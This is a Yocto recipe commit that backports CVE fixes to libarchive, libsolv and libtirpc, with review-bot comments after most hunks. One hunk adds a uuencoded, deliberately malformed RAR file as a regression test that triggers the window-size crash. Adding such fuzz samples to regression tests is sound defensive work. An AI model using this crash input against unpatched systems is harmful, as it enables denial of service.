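+Upstream-Status: Backport [https://github.com/libarchive/libarchive/pull/1493/commits/313bcd7ac547f7cc25945831f63507420c0874d7]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+--- libarchive-3.4.2.orig/Makefile.am
++++ libarchive-3.4.2/Makefile.am
+@@ -882,6 +882,7 @@ libarchive_test_EXTRA_DIST=\
+libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
++ libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu \
+libarchive/test/test_read_format_raw.bufr.uu \
+libarchive/test/test_read_format_raw.data.gz.uu \
+libarchive/test/test_read_format_raw.data.Z.uu \
+--- libarchive-3.4.2.orig/libarchive/archive_read_support_format_rar5.c
++++ libarchive-3.4.2/libarchive/archive_read_support_format_rar5.c
+@@ -3637,6 +3637,16 @@ static int do_uncompress_file(struct arc
+rar->cstate.initialized = 1;
+}
+
++ /* Don't allow extraction if window_size is invalid. */
++ if(rar->cstate.window_size == 0) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_FILE_FORMAT,
++ "Invalid window size declaration in this file");
++
++ /* This should never happen in valid files. */
++ return ARCHIVE_FATAL;
++ }
++
+if(rar->cstate.all_filters_applied == 1) {
+/* We use while(1) here, but standard case allows for just 1
+* iteration. The loop will iterate if process_block() didn't
+--- libarchive-3.4.2.orig/libarchive/test/test_read_format_rar5.c
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5.c
+@@ -1305,3 +1305,22 @@ DEFINE_TEST(test_read_format_rar5_decode
+
+EPILOGUE();
+}
++
++DEFINE_TEST(test_read_format_rar5_bad_window_size_in_multiarchive_file)
++{
++ /* oss fuzz 30459 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_bad_window_sz_in_mltarc_file.rar");
++
++ /* This file is damaged, so those functions should return failure.
++ * Additionally, SIGSEGV shouldn't be raised during execution
++ * of those functions. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++ EPILOGUE();
++}
+--- /dev/null
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+@@ -0,0 +1,7 @@
++begin 644 test_read_format_rar5_bad_window_size_in_multiarchive_file.rar
++M4F%R(1H'`0`]/-[E`@$`_R`@1#[Z5P("`PL`("`@@"(`"?\@("#___\@("`@
++M("`@("`@("`@4X`J]`,"YR(#$($@("`@``$@("`@@<L0("`@("`@("`@("`@
++M("`@(""LCTJA`P$%`B`@`2!3@"KT`P+G(@,@("`@_P,!!B`@(/___R`@(('+
++5$"`OX2`@[.SL[.S_("`@("`@("`@
++`
++end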
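Review bot: The new test `test_read_format_rar5_bad_window_size_in_multiarchive_file` says the calls "should return failure" but casts every result to `(void)`, so the `window_size == 0` check added in `do_uncompress_file` is never asserted and the test passes with or without the fix as long as nothing crashes. Asserting the outcome of the first read, for instance `assertA(archive_read_data(a, buf, sizeof(buf)) < 0);`, would pin the behaviour, provided this sample actually reaches the new branch (to be confirmed by running it). The `.uu` payload's header line names `test_read_format_rar5_bad_window_size_in_multiarchive_file.rar` while the file itself and `PROLOGUE` use `test_read_format_rar5_bad_window_sz_in_mltarc_file.rar`; the harness may ignore that name, but the two should agree. The guard rejects only zero, and `window_size` is signed (see the `(ssize_t)` cast in CVE-2021-36976-2.patch), so negative or otherwise implausible values are presumably rejected elsewhere and that is worth confirming.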
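--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
@@ -0,0 +1,29 @@
+From cfaa28168a07ea4a53276b63068f94fce37d6aff Mon Sep 17 00:00:00 2001
+From: Tim Kientzle <kientzle@acm.org>
+Date: Thu, 24 Mar 2022 10:35:00 +0100
+Subject: [PATCH] ZIP reader: fix possible out-of-bounds read in
+zipx_lzma_alone_init()
+
+Fixes #1672
+
+CVE: CVE-2022-26280
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/cfaa28168a07ea4a53276b63068f94fce37d6aff]
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+
+---
+libarchive/archive_read_support_format_zip.c | 2 +-
+1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libarchive/archive_read_support_format_zip.c b/libarchive/archive_read_support_format_zip.c
+index 38ada70b5..9d6c900b2 100644
+--- a/libarchive/archive_read_support_format_zip.c
++++ b/libarchive/archive_read_support_format_zip.c
+@@ -1667,7 +1667,7 @@ zipx_lzma_alone_init(struct archive_read *a, struct zip *zip)
+*/
+
+/* Read magic1,magic2,lzma_params from the ZIPX stream. */
+- if((p = __archive_read_ahead(a, 9, NULL)) == NULL) {
++ if(zip->entry_bytes_remaining < 9 || (p = __archive_read_ahead(a, 9, NULL)) == NULL) {
+archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
+"Truncated lzma data");
+return (ARCHIVE_FATAL);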
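Review bot: The added `zip->entry_bytes_remaining < 9` guard in the zipx_lzma_alone_init() hunk has no comment saying why it is needed on top of the `__archive_read_ahead(a, 9, NULL)` NULL check, and the literal 9 now appears twice in one condition. Presumably the read-ahead can succeed with bytes that lie past the end of the current entry, so the entry length has to be checked separately. A short comment such as `/* the entry itself must hold the 9 header bytes; read-ahead alone does not bound the read to this entry */` would keep the check from being dropped in a later patch refresh. The function body starts and ends outside the hunk, so whether later reads in it need the same bound cannot be confirmed from here.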
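--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
@@ -0,0 +1,43 @@
+From 6311080bff566fcc5591dadfd78efb41705b717f Mon Sep 17 00:00:00 2001
+From: obiwac <obiwac@gmail.com>
+Date: Fri, 22 Jul 2022 22:41:10 +0200
+Subject: [PATCH] CVE-2022-36227
+
+libarchive: CVE-2022-36227 Handle a `calloc` returning NULL (fixes #1754)
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/bff38efe8c110469c5080d387bec62a6ca15b1a5]
+CVE: CVE-2022-36227
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com
+---
+libarchive/archive_write.c | 8 ++++++++
+1 file changed, 8 insertions(+)
+
+diff --git a/libarchive/archive_write.c b/libarchive/archive_write.c
+index 98a55fb..7fe88b6 100644
+--- a/libarchive/archive_write.c
++++ b/libarchive/archive_write.c
+@@ -211,6 +211,10 @@ __archive_write_allocate_filter(struct archive *_a)
+struct archive_write_filter *f;
+
+f = calloc(1, sizeof(*f));
++
++ if (f == NULL)
++ return (NULL);
++
+f->archive = _a;
+f->state = ARCHIVE_WRITE_FILTER_STATE_NEW;
+if (a->filter_first == NULL)
+@@ -527,6 +531,10 @@ archive_write_open(struct archive *_a, void *client_data,
+a->client_data = client_data;
+
+client_filter = __archive_write_allocate_filter(_a);
++
++ if (client_filter == NULL)
++ return (ARCHIVE_FATAL);
++
+client_filter->open = archive_write_client_open;
+client_filter->write = archive_write_client_write;
+client_filter->close = archive_write_client_close;
+--
+2.25.1
+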
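Review bot: The new NULL return from `__archive_write_allocate_filter()` is handled only in `archive_write_open()`; any other caller of the allocator that dereferences the result (none are visible in these hunks) would still crash on allocation failure and needs the same check. In `archive_write_open()` the early `return (ARCHIVE_FATAL);` also leaves no error text for the caller, so something like `archive_set_error(&a->archive, ENOMEM, "Can't allocate filter");` before the return would make the failure diagnosable. In the patch header the `Signed-off-by:` trailer is missing its closing `>`, and the hash on the `From` line differs from the commit named in `Upstream-Status`, which is worth confirming. Both functions continue outside the hunks.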
diff --git a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb index 0ab40fc096..728eedc401 100644 --- a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb +++ b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb | |||
@@ -32,11 +32,23 @@ PACKAGECONFIG[mbedtls] = "--with-mbedtls,--without-mbedtls,mbedtls," | |||
32 | 32 | ||
33 | EXTRA_OECONF += "--enable-largefile" | 33 | EXTRA_OECONF += "--enable-largefile" |
34 | 34 | ||
35 | SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz" | 35 | SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz \ |
36 | file://CVE-2021-36976-1.patch \ | ||
37 | file://CVE-2021-36976-2.patch \ | ||
38 | file://CVE-2021-36976-3.patch \ | ||
39 | file://CVE-2021-23177.patch \ | ||
40 | file://CVE-2021-31566-01.patch \ | ||
41 | file://CVE-2021-31566-02.patch \ | ||
42 | file://CVE-2022-26280.patch \ | ||
43 | file://CVE-2022-36227.patch \ | ||
44 | " | ||
36 | 45 | ||
37 | SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451" | 46 | SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451" |
38 | SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176" | 47 | SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176" |
39 | 48 | ||
49 | # upstream-wontfix: upstream has documented that reported function is not thread-safe | ||
50 | CVE_CHECK_WHITELIST += "CVE-2023-30571" | ||
51 | |||
40 | inherit autotools update-alternatives pkgconfig | 52 | inherit autotools update-alternatives pkgconfig |
41 | 53 | ||
42 | CPPFLAGS += "-I${WORKDIR}/extra-includes" | 54 | CPPFLAGS += "-I${WORKDIR}/extra-includes" |
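Review bot: The `CVE_CHECK_WHITELIST += "CVE-2023-30571"` entry silences the CVE checker for this recipe, but its comment does not say which function is affected or where upstream documented the decision, so a later maintainer cannot re-evaluate the exemption. Extend the comment along the lines of `# upstream-wontfix: <function> is documented as not thread-safe, see <upstream reference>`, with both placeholders filled in from the upstream report. Separately, the tarball in `SRC_URI` is still fetched over plain `http://`. The `sha256sum` pin covers integrity, yet an https URL would be preferable if the upstream host serves one.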
diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb index 28c84af7ad..cbb38674b9 100644 --- a/meta/recipes-extended/libnsl/libnsl2_git.bb +++ b/meta/recipes-extended/libnsl/libnsl2_git.bb | |||
@@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}" | |||
14 | 14 | ||
15 | SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3" | 15 | SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3" |
16 | 16 | ||
17 | SRC_URI = "git://github.com/thkukuk/libnsl \ | 17 | SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \ |
18 | " | 18 | " |
19 | 19 | ||
20 | S = "${WORKDIR}/git" | 20 | S = "${WORKDIR}/git" |
diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb index a1d914e871..0ec64544be 100644 --- a/meta/recipes-extended/libnss-nis/libnss-nis.bb +++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb | |||
@@ -13,11 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" | |||
13 | SECTION = "libs" | 13 | SECTION = "libs" |
14 | DEPENDS += "libtirpc libnsl2" | 14 | DEPENDS += "libtirpc libnsl2" |
15 | 15 | ||
16 | PV = "3.1+git${SRCPV}" | 16 | PV = "3.2" |
17 | 17 | ||
18 | SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad" | 18 | SRCREV = "cd0d391af9535b56e612ed227c1b89be269f3d59" |
19 | 19 | ||
20 | SRC_URI = "git://github.com/thkukuk/libnss_nis \ | 20 | SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \ |
21 | " | 21 | " |
22 | 22 | ||
23 | S = "${WORKDIR}/git" | 23 | S = "${WORKDIR}/git" |
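--- /dev/null
+++ b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
@@ -0,0 +1,82 @@
+From 0077ef29eb46d2e1df2f230fc95a1d9748d49dec Mon Sep 17 00:00:00 2001
+From: Michael Schroeder <mls@suse.de>
+Date: Mon, 14 Dec 2020 11:12:00 +0100
+Subject: [PATCH] testcase_read: error out if repos are added or the system is
+changed too late
+
+We must not add new solvables after the considered map was created, the solver
+was created, or jobs were added. We may not changed the system after jobs have
+been added.
+
+(Jobs may point inside the whatproviedes array, so we must not invalidate this
+area.)
+
+Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec]
+CVE: CVE-2021-3200
+CVE: CVE-2021-33928
+CVE: CVE-2021-33929
+CVE: CVE-2021-33930
+CVE: CVE-2021-33938
+CVE: CVE-2021-44568
+CVE: CVE-2021-44569
+CVE: CVE-2021-44570
+CVE: CVE-2021-44571
+CVE: CVE-2021-44573
+CVE: CVE-2021-44574
+CVE: CVE-2021-44575
+CVE: CVE-2021-44576
+CVE: CVE-2021-44577
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ext/testcase.c | 21 +++++++++++++++++++++
+1 file changed, 21 insertions(+)
+
+diff --git a/ext/testcase.c b/ext/testcase.c
+index 0be7a213..8fb6d793 100644
+--- a/ext/testcase.c
++++ b/ext/testcase.c
+@@ -1991,6 +1991,7 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+Id *genid = 0;
+int ngenid = 0;
+Queue autoinstq;
++ int oldjobsize = job ? job->count : 0;
+
+if (resultp)
+*resultp = 0;
+@@ -2065,6 +2066,21 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+int prio, subprio;
+const char *rdata;
+
++ if (pool->considered)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after packages were disabled");
++ continue;
++ }
++ if (solv)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after the solver was created");
++ continue;
++ }
++ if (job && job->count != oldjobsize)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after jobs have been created");
++ continue;
++ }
+prepared = 0;
+if (!poolflagsreset)
+{
+@@ -2125,6 +2141,11 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+int i;
+
+/* must set the disttype before the arch */
++ if (job && job->count != oldjobsize)
++ {
++ pool_error(pool, 0, "testcase_read: cannot change the system after jobs have been created");
++ continue;
++ }
+prepared = 0;
+if (strcmp(pieces[2], "*") != 0)
+{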
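Review bot: The three new guards in the repo branch and the one in the system branch of testcase_read() carry no comment explaining the invariant they enforce; the reason is given only in the patch description. A comment above the first guard, e.g. `/* repos must not be added once the considered map, the solver or any job exists: jobs may point into the whatprovides array */`, would keep that reasoning next to the code. Each guard reports through `pool_error()` and then `continue`s, so parsing goes on with the next input line. Whether testcase_read() finally returns failure to its caller in that case is decided outside these hunks and should be confirmed.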
diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb index 265a27c00d..2c2aedc32c 100644 --- a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb +++ b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb | |||
@@ -1,4 +1,5 @@ | |||
1 | SUMMARY = "Library for solving packages and reading repositories" | 1 | SUMMARY = "Library for solving packages and reading repositories" |
2 | DESCRIPTION = "This is libsolv, a free package dependency solver using a satisfiability algorithm for solving packages and reading repositories" | ||
2 | HOMEPAGE = "https://github.com/openSUSE/libsolv" | 3 | HOMEPAGE = "https://github.com/openSUSE/libsolv" |
3 | BUGTRACKER = "https://github.com/openSUSE/libsolv/issues" | 4 | BUGTRACKER = "https://github.com/openSUSE/libsolv/issues" |
4 | SECTION = "devel" | 5 | SECTION = "devel" |
@@ -7,7 +8,8 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8" | |||
7 | 8 | ||
8 | DEPENDS = "expat zlib" | 9 | DEPENDS = "expat zlib" |
9 | 10 | ||
10 | SRC_URI = "git://github.com/openSUSE/libsolv.git \ | 11 | SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \ |
12 | file://CVE-2021-3200.patch \ | ||
11 | " | 13 | " |
12 | 14 | ||
13 | SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378" | 15 | SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378" |
diff --git a/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch new file mode 100644 index 0000000000..c78e7ef4d5 --- /dev/null +++ b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch | |||
@@ -0,0 +1,155 @@ | |||
1 | From 48309e7cb230fc539c3edab0b3363f8ce973194f Mon Sep 17 00:00:00 2001 | ||
2 | From: Hitendra Prajapati <hprajapati@mvista.com> | ||
3 | Date: Thu, 28 Jul 2022 09:11:04 +0530 | ||
4 | Subject: [PATCH] CVE-2021-46828 | ||
5 | |||
6 | Upstream-Status: Backport [http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed} | ||
7 | CVE: CVE-2021-46828 | ||
8 | Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> | ||
9 | --- | ||
10 | src/svc.c | 17 +++++++++++++- | ||
11 | src/svc_vc.c | 62 +++++++++++++++++++++++++++++++++++++++++++++++++++- | ||
12 | 2 files changed, 77 insertions(+), 2 deletions(-) | ||
13 | |||
14 | diff --git a/src/svc.c b/src/svc.c | ||
15 | index 6db164b..3a8709f 100644 | ||
16 | --- a/src/svc.c | ||
17 | +++ b/src/svc.c | ||
18 | @@ -57,7 +57,7 @@ | ||
19 | |||
20 | #define max(a, b) (a > b ? a : b) | ||
21 | |||
22 | -static SVCXPRT **__svc_xports; | ||
23 | +SVCXPRT **__svc_xports; | ||
24 | int __svc_maxrec; | ||
25 | |||
26 | /* | ||
27 | @@ -194,6 +194,21 @@ __xprt_do_unregister (xprt, dolock) | ||
28 | rwlock_unlock (&svc_fd_lock); | ||
29 | } | ||
30 | |||
31 | +int | ||
32 | +svc_open_fds() | ||
33 | +{ | ||
34 | + int ix; | ||
35 | + int nfds = 0; | ||
36 | + | ||
37 | + rwlock_rdlock (&svc_fd_lock); | ||
38 | + for (ix = 0; ix < svc_max_pollfd; ++ix) { | ||
39 | + if (svc_pollfd[ix].fd != -1) | ||
40 | + nfds++; | ||
41 | + } | ||
42 | + rwlock_unlock (&svc_fd_lock); | ||
43 | + return (nfds); | ||
44 | +} | ||
45 | + | ||
46 | /* | ||
47 | * Add a service program to the callout list. | ||
48 | * The dispatch routine will be called when a rpc request for this | ||
49 | diff --git a/src/svc_vc.c b/src/svc_vc.c | ||
50 | index c23cd36..1729963 100644 | ||
51 | --- a/src/svc_vc.c | ||
52 | +++ b/src/svc_vc.c | ||
53 | @@ -64,6 +64,8 @@ | ||
54 | |||
55 | |||
56 | extern rwlock_t svc_fd_lock; | ||
57 | +extern SVCXPRT **__svc_xports; | ||
58 | +extern int svc_open_fds(); | ||
59 | |||
60 | static SVCXPRT *makefd_xprt(int, u_int, u_int); | ||
61 | static bool_t rendezvous_request(SVCXPRT *, struct rpc_msg *); | ||
62 | @@ -82,6 +84,7 @@ static void svc_vc_ops(SVCXPRT *); | ||
63 | static bool_t svc_vc_control(SVCXPRT *xprt, const u_int rq, void *in); | ||
64 | static bool_t svc_vc_rendezvous_control (SVCXPRT *xprt, const u_int rq, | ||
65 | void *in); | ||
66 | +static int __svc_destroy_idle(int timeout); | ||
67 | |||
68 | struct cf_rendezvous { /* kept in xprt->xp_p1 for rendezvouser */ | ||
69 | u_int sendsize; | ||
70 | @@ -312,13 +315,14 @@ done: | ||
71 | return (xprt); | ||
72 | } | ||
73 | |||
74 | + | ||
75 | /*ARGSUSED*/ | ||
76 | static bool_t | ||
77 | rendezvous_request(xprt, msg) | ||
78 | SVCXPRT *xprt; | ||
79 | struct rpc_msg *msg; | ||
80 | { | ||
81 | - int sock, flags; | ||
82 | + int sock, flags, nfds, cnt; | ||
83 | struct cf_rendezvous *r; | ||
84 | struct cf_conn *cd; | ||
85 | struct sockaddr_storage addr; | ||
86 | @@ -378,6 +382,16 @@ again: | ||
87 | |||
88 | gettimeofday(&cd->last_recv_time, NULL); | ||
89 | |||
90 | + nfds = svc_open_fds(); | ||
91 | + if (nfds >= (_rpc_dtablesize() / 5) * 4) { | ||
92 | + /* destroy idle connections */ | ||
93 | + cnt = __svc_destroy_idle(15); | ||
94 | + if (cnt == 0) { | ||
95 | + /* destroy least active */ | ||
96 | + __svc_destroy_idle(0); | ||
97 | + } | ||
98 | + } | ||
99 | + | ||
100 | return (FALSE); /* there is never an rpc msg to be processed */ | ||
101 | } | ||
102 | |||
103 | @@ -819,3 +833,49 @@ __svc_clean_idle(fd_set *fds, int timeout, bool_t cleanblock) | ||
104 | { | ||
105 | return FALSE; | ||
106 | } | ||
107 | + | ||
108 | +static int | ||
109 | +__svc_destroy_idle(int timeout) | ||
110 | +{ | ||
111 | + int i, ncleaned = 0; | ||
112 | + SVCXPRT *xprt, *least_active; | ||
113 | + struct timeval tv, tdiff, tmax; | ||
114 | + struct cf_conn *cd; | ||
115 | + | ||
116 | + gettimeofday(&tv, NULL); | ||
117 | + tmax.tv_sec = tmax.tv_usec = 0; | ||
118 | + least_active = NULL; | ||
119 | + rwlock_wrlock(&svc_fd_lock); | ||
120 | + | ||
121 | + for (i = 0; i <= svc_max_pollfd; i++) { | ||
122 | + if (svc_pollfd[i].fd == -1) | ||
123 | + continue; | ||
124 | + xprt = __svc_xports[i]; | ||
125 | + if (xprt == NULL || xprt->xp_ops == NULL || | ||
126 | + xprt->xp_ops->xp_recv != svc_vc_recv) | ||
127 | + continue; | ||
128 | + cd = (struct cf_conn *)xprt->xp_p1; | ||
129 | + if (!cd->nonblock) | ||
130 | + continue; | ||
131 | + if (timeout == 0) { | ||
132 | + timersub(&tv, &cd->last_recv_time, &tdiff); | ||
133 | + if (timercmp(&tdiff, &tmax, >)) { | ||
134 | + tmax = tdiff; | ||
135 | + least_active = xprt; | ||
136 | + } | ||
137 | + continue; | ||
138 | + } | ||
139 | + if (tv.tv_sec - cd->last_recv_time.tv_sec > timeout) { | ||
140 | + __xprt_unregister_unlocked(xprt); | ||
141 | + __svc_vc_dodestroy(xprt); | ||
142 | + ncleaned++; | ||
143 | + } | ||
144 | + } | ||
145 | + if (timeout == 0 && least_active != NULL) { | ||
146 | + __xprt_unregister_unlocked(least_active); | ||
147 | + __svc_vc_dodestroy(least_active); | ||
148 | + ncleaned++; | ||
149 | + } | ||
150 | + rwlock_unlock(&svc_fd_lock); | ||
151 | + return (ncleaned); | ||
152 | +} | ||
153 | -- | ||
154 | 2.25.1 | ||
155 | |||
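Review bot: The scan in the new `__svc_destroy_idle()` runs `for (i = 0; i <= svc_max_pollfd; i++)`, while `svc_open_fds()` added by the same patch walks the same `svc_pollfd` array with `ix < svc_max_pollfd`, so one of the two bounds is wrong. If `svc_max_pollfd` is a count, the `<=` form reads `svc_pollfd[i]` and `__svc_xports[i]` one element past the end. Unless the definition of `svc_max_pollfd` (not visible here) says otherwise, use `for (i = 0; i < svc_max_pollfd; i++) {`. `cd = (struct cf_conn *)xprt->xp_p1;` is also dereferenced without a NULL check. In the patch header the `Upstream-Status` bracket is closed with `}` instead of `]`, which may trip tooling that parses the tag.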
diff --git a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb index 10a324c3b6..80151ff83a 100644 --- a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb +++ b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb | |||
@@ -9,7 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f835cce8852481e4b2bbbdd23b5e47f3 \ | |||
9 | 9 | ||
10 | PROVIDES = "virtual/librpc" | 10 | PROVIDES = "virtual/librpc" |
11 | 11 | ||
12 | SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2" | 12 | SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2 \ |
13 | file://CVE-2021-46828.patch \ | ||
14 | " | ||
13 | UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/" | 15 | UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/" |
14 | UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/" | 16 | UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/" |
15 | SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb" | 17 | SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb" |
@@ -20,7 +22,7 @@ inherit autotools pkgconfig | |||
20 | EXTRA_OECONF = "--disable-gssapi" | 22 | EXTRA_OECONF = "--disable-gssapi" |
21 | 23 | ||
22 | do_install_append() { | 24 | do_install_append() { |
23 | chown root:root ${D}${sysconfdir}/netconfig | 25 | test -e ${D}${sysconfdir}/netconfig && chown root:root ${D}${sysconfdir}/netconfig |
24 | } | 26 | } |
25 | 27 | ||
26 | BBCLASSEXTEND = "native nativesdk" | 28 | BBCLASSEXTEND = "native nativesdk" |
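Review bot: `test -e ${D}${sysconfdir}/netconfig && chown root:root ${D}${sysconfdir}/netconfig` in `do_install_append()` evaluates to a non-zero status when the file is absent, and if this ends up as the last command of the assembled install function that status becomes the function's result and can fail the task under `set -e`. An explicit conditional avoids that: `if [ -e ${D}${sysconfdir}/netconfig ]; then chown root:root ${D}${sysconfdir}/netconfig; fi`.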
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch index f17bdce2c0..44b9136b05 100644 --- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch | |||
@@ -1,4 +1,4 @@ | |||
1 | From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001 | 1 | From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001 |
2 | From: Alexander Kanavin <alex.kanavin@gmail.com> | 2 | From: Alexander Kanavin <alex.kanavin@gmail.com> |
3 | Date: Fri, 26 Aug 2016 18:20:32 +0300 | 3 | Date: Fri, 26 Aug 2016 18:20:32 +0300 |
4 | Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. | 4 | Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. |
@@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. | |||
6 | RP 2014/5/22 | 6 | RP 2014/5/22 |
7 | Upstream-Status: Pending | 7 | Upstream-Status: Pending |
8 | Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> | 8 | Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> |
9 | |||
9 | --- | 10 | --- |
10 | configure.ac | 16 ++++++++++++---- | 11 | configure.ac | 16 ++++++++++++---- |
11 | 1 file changed, 12 insertions(+), 4 deletions(-) | 12 | 1 file changed, 12 insertions(+), 4 deletions(-) |
12 | 13 | ||
13 | diff --git a/configure.ac b/configure.ac | 14 | diff --git a/configure.ac b/configure.ac |
14 | index 5383cec..c29a902 100644 | 15 | index dbddfb9..62cf17f 100644 |
15 | --- a/configure.ac | 16 | --- a/configure.ac |
16 | +++ b/configure.ac | 17 | +++ b/configure.ac |
17 | @@ -651,10 +651,18 @@ AC_ARG_WITH([pcre], | 18 | @@ -748,10 +748,18 @@ AC_ARG_WITH([pcre], |
18 | ) | 19 | ) |
19 | AC_MSG_RESULT([$WITH_PCRE]) | 20 | AC_MSG_RESULT([$WITH_PCRE]) |
20 | 21 | ||
@@ -37,6 +38,3 @@ index 5383cec..c29a902 100644 | |||
37 | else | 38 | else |
38 | AC_PATH_PROG([PCRECONFIG], [pcre-config]) | 39 | AC_PATH_PROG([PCRECONFIG], [pcre-config]) |
39 | if test -n "$PCRECONFIG"; then | 40 | if test -n "$PCRECONFIG"; then |
40 | -- | ||
41 | 2.15.0 | ||
42 | |||
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch new file mode 100644 index 0000000000..e226366112 --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch | |||
@@ -0,0 +1,224 @@ | |||
1 | From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001 | ||
2 | From: Glenn Strauss <gstrauss@gluelogic.com> | ||
3 | Date: Wed, 23 Dec 2020 23:14:47 -0500 | ||
4 | Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033) | ||
5 | |||
